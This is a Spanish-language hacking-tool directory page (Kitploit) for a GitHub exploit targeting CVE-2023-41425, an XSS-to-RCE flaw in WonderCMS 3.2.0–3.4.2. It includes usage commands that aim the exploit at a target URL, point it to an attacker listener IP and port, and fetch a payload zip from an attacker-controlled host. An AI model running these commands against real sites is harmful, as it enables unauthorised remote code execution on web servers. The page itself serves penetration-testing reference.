Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-41425 — WonderCMS RCE CVE-2023-41425 | Kitploit
Herramientas/GitHubGitHub/twappz/cve-2023-41425
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtwappz/cve-2023-41425

CVE-2023-41425

WonderCMS RCE CVE-2023-41425

Ver Repositorio
11hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RCE para WonderCMS versiones v3.2.0 a v3.4.2

Las versiones de WonderCMS v3.2.0 a v3.4.2 con vulnerabilidad XSS permiten a un actor malicioso lograr RCE subiendo un componente al installModule CVE-2023-41425 (No es necesario conocer la contraseña).

Características:

  • Explotación automatizada de CVE-2023-41425
  • Facilidad para especificar el host remoto desde donde se descarga el zip

Uso/Ejemplos

Especificando el host remoto desde donde se descarga el archivo main.zip

./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip

O

sin especificar el archivo main.zip. Por defecto, se descarga de main.zip

./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321

Capturas de pantalla

Useage Useage

🔗 Enlaces

my website youtube twitter instagram Hack the box

Descargar herramienta